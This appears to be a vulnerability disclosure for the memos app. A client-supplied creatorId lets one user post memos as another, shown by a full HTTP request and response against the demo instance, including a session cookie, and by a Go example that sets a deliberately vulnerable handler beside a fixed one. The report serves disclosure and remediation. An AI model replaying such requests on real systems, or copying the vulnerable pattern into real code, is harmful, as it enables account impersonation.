An attacker can post content into another user's memos page via a POST request to /api/memo: the attacker simply adds a creatorId field to the JSON request body (here sent with Burp Suite). The server trusts the client-supplied creatorId instead of the user identified by the memos_session cookie, so the memo is stored as if the victim (creatorId 104, "demouser" on the demo instance) had written it. The creatorId is a sequential integer, so a victim's ID is trivial to guess or enumerate.
Here is the video PoC: https://drive.google.com/file/d/1dNKo-ybfguam4YdvmluYujN2nkTG5D9G/view?usp=share_link

Request (sent with the attacker's own session cookie; note the injected creatorId in the body):
POST /api/memo HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MjA0OTc2MnxEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfLUE9fO9PeYJaiVNyk3XeLr92UBxuKGY5S-4YXFqSUSCvaAvB
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 116
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{
"creatorId":104,
"content":"post this message in demouser wall ","visibility":"PRIVATE",
"resourceIdList":[]
}
Response (memo 1054 is created with creatorId 104 and creator "demouser", i.e. attributed to the victim's account rather than to the session owner):
HTTP/2 200 OK
Date: Mon, 26 Dec 2022 10:29:50 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 423
Cf-Ray: 77f9233de8d5231a-HKG
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
{"data":{"id":1054,"rowStatus":"NORMAL","creatorId":104,"createdTs":1672050590,"updatedTs":1672050590,"content":"post this message in demouser wall ","visibility":"PRIVATE","pinned":false,"displayTs":1672050590,"creator":{"id":104,"rowStatus":"NORMAL","createdTs":1672035458,"updatedTs":1672035527,"username":"demouser","role":"USER","email":"","nickname":"demouser","openId":"","userSettingList":null},"resourceList":[]}}
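The root cause is that the memo creation handler takes the creator identity from the request body instead of from the authenticated session. As an added illustration, not code from the memos project itself, the following Go program models a minimal POST /api/memo handler in both forms: vulnerableCreateMemo binds creatorId straight from the JSON (the reported behaviour), while fixedCreateMemo discards whatever the client sent and uses the user ID attached to the request context by a (simulated) session middleware. The middleware, the handler names, the user IDs and the request body are constructed for the example.

```go
package main

import (
	"context"
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// memoCreate models the JSON body accepted by POST /api/memo.
// Constructed for this example; field names follow the request shown above.
type memoCreate struct {
	CreatorID  int    `json:"creatorId"`
	Content    string `json:"content"`
	Visibility string `json:"visibility"`
}

type ctxKey string

const sessionUserKey ctxKey = "sessionUserID"

// withSession stands in for the session middleware: in the real app the user
// ID would be decoded from the memos_session cookie. Here it is passed in.
func withSession(userID int, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		ctx := context.WithValue(r.Context(), sessionUserKey, userID)
		next.ServeHTTP(w, r.WithContext(ctx))
	})
}

// vulnerableCreateMemo reproduces the flaw: creatorId is taken from the body,
// so any authenticated user can attribute a memo to any other user.
func vulnerableCreateMemo(w http.ResponseWriter, r *http.Request) {
	var in memoCreate
	if err := json.NewDecoder(r.Body).Decode(&in); err != nil {
		http.Error(w, "bad request", http.StatusBadRequest)
		return
	}
	// BUG: in.CreatorID is attacker-controlled and is stored as-is.
	json.NewEncoder(w).Encode(map[string]interface{}{
		"creatorId": in.CreatorID, "content": in.Content, "visibility": in.Visibility,
	})
}

// fixedCreateMemo ignores any client-supplied creatorId and always uses the
// identity established by the session. The body field is still decoded (so
// clients sending it do not break) but it is overwritten before use.
func fixedCreateMemo(w http.ResponseWriter, r *http.Request) {
	uid, ok := r.Context().Value(sessionUserKey).(int)
	if !ok {
		http.Error(w, "unauthorized", http.StatusUnauthorized)
		return
	}
	var in memoCreate
	if err := json.NewDecoder(r.Body).Decode(&in); err != nil {
		http.Error(w, "bad request", http.StatusBadRequest)
		return
	}
	in.CreatorID = uid // server-side authority, never the request body
	json.NewEncoder(w).Encode(map[string]interface{}{
		"creatorId": in.CreatorID, "content": in.Content, "visibility": in.Visibility,
	})
}

// CreatorIDReturned sends body to handler h as sessionUserID and returns the
// creatorId the server stored, so the two handlers can be compared directly.
func CreatorIDReturned(h http.HandlerFunc, sessionUserID int, body string) int {
	req := httptest.NewRequest(http.MethodPost, "/api/memo", strings.NewReader(body))
	req.Header.Set("Content-Type", "application/json")
	rec := httptest.NewRecorder()
	withSession(sessionUserID, h).ServeHTTP(rec, req)
	var out struct {
		CreatorID int `json:"creatorId"`
	}
	_ = json.NewDecoder(rec.Body).Decode(&out)
	return out.CreatorID
}

func main() {
	// Attacker (session user 42) tries to post as victim 104.
	body := `{"creatorId":104,"content":"post this message in demouser wall ","visibility":"PRIVATE"}`
	fmt.Println("vulnerable handler stored creatorId:", CreatorIDReturned(vulnerableCreateMemo, 42, body))
	fmt.Println("fixed handler stored creatorId:     ", CreatorIDReturned(fixedCreateMemo, 42, body))
}
```

The same rule applies to any other field that encodes ownership (for example a creator on resource uploads): derive it from the session on the server and treat the body value as untrusted. Rejecting a mismatching creatorId with 403 instead of silently overriding it is an equally valid fix and makes tampering attempts visible in logs.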